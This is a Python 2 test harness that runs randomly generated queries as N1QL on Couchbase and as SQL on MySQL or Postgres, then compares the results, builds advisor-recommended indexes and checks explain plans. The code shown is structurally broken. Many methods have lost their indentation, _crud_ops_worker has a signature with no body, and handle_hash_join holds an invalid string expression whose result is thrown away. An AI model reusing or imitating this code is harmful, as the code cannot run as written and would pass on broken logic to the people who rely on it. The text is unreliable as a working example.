            self.advise_server = self.input.advisor
            self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
            self.advise_dict={}
            # A single input_rqg_path bundles index defs, db dump, and templates.
            if self.input_rqg_path is not None:
                self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
                self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
                self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
            if self.initial_loading_to_cb:
                self._initialize_cluster_setup()
            if self.subquery:
                self.items = 500
            if not self.use_rest:
                self._ssh_client = paramiko.SSHClient()
                self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                self.os = self.shell.extract_remote_info().type.lower()
        except Exception, ex:
            self.log.info("============== RQG Setup Has Failed ==============")
            traceback.print_exc()
            # NOTE(review): assertTrue(False) raises, so the tearDown() call
            # below appears unreachable — confirm intended ordering.
            self.assertTrue(False)
            self.tearDown()
        self.log.info("============== RQG Setup Has Completed ==============")
    def tearDown(self):
        """Tear down the base test case, then drop the MySQL test database when this run owns it."""
        try:
            self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
            super(BaseRQGTests, self).tearDown()
            self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
            self.log.info("============== RQG Teardown Has Started ==============")
            # hasattr guards against setUp having failed before reset_database was set.
            if hasattr(self, 'reset_database'):
                if self.teardown_mysql:
                    client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
                    self.kill_mysql_processes(client)
                    client.drop_database(self.database)
        except Exception, ex:
            self.log.info("============== RQG Teardown Has Failed ==============")
            self.log.info(ex)
        self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in result.keys():
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
    def test_rqg(self):
        """Main RQG driver: batch query templates per table, run them, and assert on the results.

        Python 2 code (py2 `Queue` module, `except Exception, ex`). Threading
        is currently disabled in favour of sequential worker calls (see the
        commented-out Thread blocks).
        """
        try:
            # Get Data Map
            table_list = self.client._get_table_list()
            table_map = self.client._get_values_with_type_for_fields_in_table()
            if self.remove_alias:
                table_map = self.remove_aliases_from_table_map(table_map)
            if self.crud_ops:
                # The copy table is only a merge source, never a CRUD target.
                table_list.remove("copy_simple_table")
            query_template_list = self.extract_query_templates()
            # Generate the query batches based on the given template file and the concurrency count
            batches = self.generate_batches(table_list, query_template_list)
            result_queue = Queue.Queue()
            failure_queue = Queue.Queue()
            input_queue = Queue.Queue()
            # Run Test Batches
            thread_list = []
            start_test_case_number = 1
            if self.crud_ops:
                # CRUD mode: batches is a dict keyed by table name.
                for table_name in table_list:
                    if len(batches[table_name]) > 0:
                        self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
                        #t = threading.Thread(target=self._crud_ops_worker, args=(
                        #batches[table_name], table_name, table_map, result_queue, failure_queue))
                        #t.daemon = True
                        #t.start()
                        #thread_list.append(t)
                #for t in thread_list:
                    #t.join()
            else:
                # Query mode: batches is a Queue of template batches.
                while not batches.empty():
                    # Split up the batches and send them to the worker threads
                    try:
                        test_batch = batches.get(False)
                    except Exception, ex:
                        break
                    test_query_template_list = [test_data[test_data.keys()[0]] for test_data in test_batch]
                    input_queue.put({"start_test_case_number": start_test_case_number,
                                     "query_template_list": test_query_template_list})
                    start_test_case_number += len(test_query_template_list)
                for table_name in table_list:
                    # Create threads based on number of tables (each table has its own thread)
                    self._rqg_worker(table_name, table_map, input_queue, result_queue,
                                     failure_queue)
                    #t = threading.Thread(target=self._rqg_worker,
                    #                     args=(table_name, table_map, input_queue, result_queue,
                    #                           failure_queue))
                    #t.daemon = True
                    #t.start()
                    #thread_list.append(t)
                #for t in thread_list:
                #    if(t.is_alive()):
                #        t.join()
            # Analyze the results for the failure and assert on the run
            self.analyze_test(result_queue, failure_queue)
        except Exception, ex:
            traceback.print_exc()
            self.log.info(ex)
            self.assertFalse(True)
    def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
        """Consume template batches from input_queue and run them against one table.

        Spawns one thread per generated test case; optionally builds (and later
        drops) the secondary indexes the generated queries reference. Exits
        after the configured total query count, or after ~1000 idle polls.
        """
        count = 0
        table_name_description_map = {table_name: table_map[table_name]}
        while True:
            if self.total_queries <= self.query_count:
                break
            if not input_queue.empty():
                data = input_queue.get()
                start_test_case_number = data["start_test_case_number"]
                query_template_list = data["query_template_list"]
                # create strings for queries and indexes but doesnt send indexes to Couchbase
                sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
                                                                                  n1ql_queries=query_template_list,
                                                                                  define_gsi_index=self.use_secondary_index,
                                                                                  aggregate_pushdown=self.aggregate_pushdown,
                                                                                  partitioned_indexes=self.partitioned_indexes,
                                                                                  ansi_joins=self.ansi_joins,
                                                                                  with_let=self.with_let)
                # Qualify the generic table name with the database prefix.
                for sql_n1ql_index_map in sql_n1ql_index_map_list:
                    sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
                # build indexes
                if self.use_secondary_index:
                    self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
                thread_list = []
                test_case_number = start_test_case_number
                for test_case_input in sql_n1ql_index_map_list:
                    t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
                    #self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
                    test_case_number += 1
                    t.daemon = True
                    t.start()
                    thread_list.append(t)
                # Drop all the secondary Indexes
                for t in thread_list:
                    t.join()
                if self.use_secondary_index and self.drop_secondary_indexes:
                    self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
            else:
                # Idle poll: give up after 1000 empty checks.
                count += 1
                if count > 1000:
                    return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True):
if self.use_advisor:
self.create_secondary_index(n1ql_query=n1ql_query)
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
return n1ql_query
    def create_secondary_index(self, n1ql_query=""):
        """Ask the ADVISE service for indexes benefiting `n1ql_query` and create them.

        Python 2 code (`except CBQError, ex`). Evicts all indexes once the
        configured index_limit is reached, then creates both the plain and the
        covering recommendations, ignoring already-existing ones.
        """
        # Keep the total index count bounded.
        if self.count_secondary_indexes() >= self.index_limit:
            self.remove_all_secondary_indexes()
            self.n1ql_helper.wait_for_all_indexes_online()
        # ADVISE runs on the dedicated advisor cluster with aliased bucket names.
        advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
        advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
                                                       server=self.advise_server)
        if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
            return
        if "index recommendation at this time" not in str(
                str(advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"])):
            if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
                "recommended_indexes"].keys():
                for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["indexes"]:
                    index_statement = index_statement_array["index_statement"]
                    if index_statement != "":
                        self.n1ql_helper.wait_for_all_indexes_online()
                        try:
                            # Translate alias names back before creating on the test cluster.
                            prepared_index_statement = self.translate_index_statement(index_statement)
                            self.n1ql_helper.run_cbq_query(prepared_index_statement)
                            self.n1ql_helper.wait_for_all_indexes_online()
                        except CBQError, ex:
                            if "already exists" in str(ex):
                                continue
            if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
                "recommended_indexes"].keys():
                for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["covering_indexes"]:
                    index_statement = index_statement_array["index_statement"]
                    if index_statement != "":
                        self.n1ql_helper.wait_for_all_indexes_online()
                        try:
                            prepared_index_statement = self.translate_index_statement(index_statement)
                            self.n1ql_helper.run_cbq_query(prepared_index_statement)
                            self.n1ql_helper.wait_for_all_indexes_online()
                        except CBQError, ex:
                            if "already exists" in str(ex):
                                continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query);
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in indexes.keys():
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in indexes.keys():
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
    def _crud_ops_worker(self, table_name, table_map, result_queue=None, failure_record_queue=None):
def remove_aliases_from_table_map(self, table_map):
for key in table_map.keys():
if "alias_name" in table_map[key].keys():
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
    def generate_batches(self, table_list, query_template_list):
        """Partition query templates into batches for the workers.

        CRUD mode returns a dict {table_name: [{case_number: template}, ...]}
        with templates round-robined across tables; query mode returns a
        py2 Queue.Queue of batches of size `concurreny_count`. At most
        `total_queries` templates are consumed.
        """
        if self.crud_ops:
            batches = {}
            for table_name in table_list:
                batches[table_name] = []
        else:
            batches = Queue.Queue()
        batch = []
        count = 1
        inserted_count = 0
        test_case_number = 1
        for template_query in query_template_list:
            if self.crud_ops:
                # Round-robin templates across the tables.
                batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
            else:
                batch.append({str(test_case_number): template_query})
                if count == self.concurreny_count:
                    # Batch is full: enqueue it and start a new one.
                    inserted_count += len(batch)
                    batches.put(batch)
                    count = 1
                    batch = []
                else:
                    count += 1
            test_case_number += 1
            if test_case_number > self.total_queries:
                break
        if not self.crud_ops:
            # Flush the final partially-filled batch.
            if len(batch) > 0:
                batches.put(batch)
        return batches
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
def handle_n1ql_table_name(self, n1ql_query):
if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception, ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
client._close_connection()
client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
    def _test_result_analysis(self, queue):
        """Drain per-test results from queue and aggregate pass/fail statistics.

        Returns (success, summary, result): overall boolean, a human-readable
        summary including keyword/failure-type distributions, and the detailed
        per-test failure report built by _generate_result().
        """
        result_list = []
        pass_case = 0
        fail_case = 0
        failure_map = {}
        keyword_map = {}
        failure_reason_map = {}
        success = True
        while not queue.empty():
            result_list.append(queue.get())
        total = len(result_list)
        for result_run in result_list:
            test_case_number = result_run["test_case_number"]
            sql_query = result_run["sql_query"]
            n1ql_query = result_run["n1ql_query"]
            check, message, failure_types = self._analyze_result(result_run)
            success = success and check
            if check:
                pass_case += 1
            else:
                fail_case += 1
                # tally how often each failure scenario type occurred
                for failure_reason_type in failure_types:
                    if failure_reason_type not in failure_reason_map.keys():
                        failure_reason_map[failure_reason_type] = 1
                    else:
                        failure_reason_map[failure_reason_type] += 1
                # tally which query keywords appear in failing queries
                keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
                for keyword in keyword_list:
                    if keyword not in keyword_map.keys():
                        keyword_map[keyword] = 1
                    else:
                        keyword_map[keyword] += 1
                failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
                                                 "run_result": message, "keyword_list": keyword_list}
        pass_percent = 0  # NOTE(review): assigned but never used
        if total > 0:
            # NOTE(review): integer division under Python 2 truncates the percentage
            summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
        else:
            summary = " No Query Results Found"
        if len(keyword_map) > 0:
            summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
            for keyword in keyword_map.keys():
                summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
        if len(failure_reason_map) > 0:
            summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
            for keyword in failure_reason_map.keys():
                summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
        # NOTE(review): this log line divides by total unconditionally and would
        # raise ZeroDivisionError when the queue was empty -- confirm intent
        self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
        result = self._generate_result(failure_map)
        return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print "Error in sql syntax"
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
    def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
        """Run the N1QL query and its SQL reference, then compare result sets.

        Uses expected_result when provided, otherwise executes sql_query against
        MySQL/Postgres. Returns {"success": bool, "result": message}.
        """
        if not self.create_primary_index:
            n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
        if self.prepared:
            n1ql_query = "PREPARE " + n1ql_query
        self.log.info(" SQL QUERY :: {0}".format(sql_query))
        self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
        # Run n1ql query
        hints = self.query_helper._find_hints(sql_query)
        for i, item in enumerate(hints):
            if "simple_table" in item:
                hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
        try:
            if subquery:
                # subqueries can be slow; allow a generous server-side timeout
                query_params = {'timeout': '1200s'}
            else:
                query_params={}
            actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
            if self.prepared:
                # execute the prepared statement by the name PREPARE returned
                name = actual_result["results"][0]['name']
                prepared_query = "EXECUTE '%s'" % name
                self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
                actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
            n1ql_result = actual_result["results"]
            # Run SQL Query
            sql_result = expected_result
            client = None
            if self.use_mysql:
                client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
            elif self.use_postgres:
                client = RQGPostgresClient()
            if expected_result is None:
                columns, rows = client._execute_query(query=sql_query)
                if self.aggregate_pushdown:
                    sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
                else:
                    sql_result = client._gen_json_from_results(columns, rows)
            client._close_connection()
            self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
            self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
            if len(n1ql_result) != len(sql_result):
                self.log.info("number of results returned from sql and n1ql are different")
                self.log.info("sql query is {0}".format(sql_query))
                self.log.info("n1ql query is {0}".format(n1ql_query))
                # empty-vs-single-row mismatches pass (e.g. aggregates over no
                # rows) -- NOTE(review): confirm that treating len(sql)==0 as a
                # pass is intended
                if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
                    return {"success": True, "result": "Pass"}
                return {"success": False, "result": str("different results")}
            try:
                self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
            except Exception, ex:
                self.log.info(ex)
                traceback.print_exc()
                return {"success": False, "result": str(ex)}
            return {"success": True, "result": "Pass"}
        except Exception, ex:
            self.log.info(ex)
            traceback.print_exc()
            return {"success": False, "result": str(ex)}
    def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
        """Run the verification query against both N1QL and MySQL after a CRUD
        operation and compare the row sets.

        Returns {"success": bool, "result": message}.
        """
        self.log.info(" SQL QUERY :: {0}".format(sql_query))
        self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
        # qualify the table name with the database prefix if not already present
        if n1ql_query.find(self.database) <= 0:
            n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
        hints = self.query_helper._find_hints(sql_query)
        for i, item in enumerate(hints):
            if "simple_table" in item:
                hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
        try:
            actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
            n1ql_result = actual_result["results"]
            # Run SQL Query
            sql_result = expected_result
            client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
            if expected_result is None:
                columns, rows = client._execute_query(query=sql_query)
                sql_result = client._gen_json_from_results(columns, rows)
            client._close_connection()
            self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
            self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
            if len(n1ql_result) != len(sql_result):
                self.log.info("number of results returned from sql and n1ql are different")
                self.log.info("sql query is {0}".format(sql_query))
                self.log.info("n1ql query is {0}".format(n1ql_query))
                # empty-vs-single-row mismatches pass -- NOTE(review): verify intent
                if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
                    return {"success": True, "result": "Pass"}
            try:
                self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
            except Exception, ex:
                self.log.info(ex)
                return {"success": False, "result": str(ex)}
            return {"success": True, "result": "Pass"}
        except Exception, ex:
            return {"success": False, "result": str(ex)}
    def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
        """EXPLAIN n1ql_query once per index in indexes and verify each index is chosen.

        Returns {"Explain for index <name>": {"success": bool, "result": msg}}
        with one entry per index.
        """
        run_result = {}
        # Run n1ql query
        for index_name in indexes:
            hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
            n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
            self.log.info(n1ql)
            message = "Pass"
            check = True
            fieldsnotcovered = False
            if self.check_covering_index:
                # determine whether the query's group-by/order-by columns fall
                # outside the index's key fields
                query = "select * from system:indexes where name = '%s'" % index_name
                actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
                n1ql_result = actual_result["results"]
                fields = n1ql_result[0]["indexes"]["index_key"]
                fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
            # NOTE(review): `and` binds tighter than `or`, so this reads as
            # "NOT" in n1ql OR "not" in n1ql OR (fieldsnotcovered AND
            # check_covering_index) -- confirm the NOT clauses were not meant to
            # be guarded by check_covering_index as well
            if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
                key = "Explain for index {0}".format(index_name)
                run_result[key] = {"success": check, "result": message}
            else:
                try:
                    actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
                    self.log.info(actual_result)
                    check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
                                                                       self.check_covering_index)
                    if not check:
                        message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
                        self.log.info(message)
                except Exception, ex:
                    self.log.info(ex)
                    message = ex
                    check = False
                finally:
                    key = "Explain for index {0}".format(index_name)
                    run_result[key] = {"success": check, "result": message}
        return run_result
